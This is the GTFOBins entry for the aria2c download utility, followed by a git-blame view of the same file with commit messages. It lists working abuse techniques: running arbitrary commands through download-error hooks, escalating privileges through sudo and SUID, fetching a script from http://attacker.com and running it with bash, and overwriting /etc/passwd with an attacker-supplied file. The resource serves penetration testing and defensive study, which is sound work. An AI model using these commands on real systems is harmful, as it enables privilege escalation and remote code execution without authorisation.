GTFOBins.github.io/_gtfobins/aria2c.md

---
description: Note that the subprocess is immediately sent to the background.
functions:
  command:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        aria2c --on-download-error=$TF http://x
    - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
      code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
  sudo:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        sudo aria2c --on-download-error=$TF http://x
  suid:
    - code: |
        aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
    - description: Remote download and replace /etc/passwd with root privilege.
  limited-suid:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        ./aria2c --on-download-error=$TF http://x
---
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 09:53:15 +00:00			`---`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 11:30:55 +00:00			`description: Note that the subprocess is immediately sent to the background.`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 09:53:15 +00:00			`functions:`
Adopt new function names 2018-10-05 17:55:38 +00:00			`command:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 11:30:55 +00:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`aria2c --on-download-error=$TF http://x`
Clarify aria2c --allow-overwrite As discussed in #22. 2018-09-07 11:46:22 +00:00			- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 11:30:55 +00:00			`code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa`
Switch SUID to Limited SUID in aria2c 2021-01-11 11:45:21 +00:00			`sudo:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 11:30:55 +00:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
Switch SUID to Limited SUID in aria2c 2021-01-11 11:45:21 +00:00			`sudo aria2c --on-download-error=$TF http://x`
Add SUID method to aria2c Found this new method of abusing aria2c's suid for privilege escalation. 2023-01-02 08:36:59 +00:00			`suid:`
			`- code: \|`
			`aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true`
			`- description: Remote download and replace /etc/passwd with root privilege.`
Switch SUID to Limited SUID in aria2c 2021-01-11 11:45:21 +00:00			`limited-suid:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 11:30:55 +00:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
Switch SUID to Limited SUID in aria2c 2021-01-11 11:45:21 +00:00			`./aria2c --on-download-error=$TF http://x`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 09:53:15 +00:00			`---`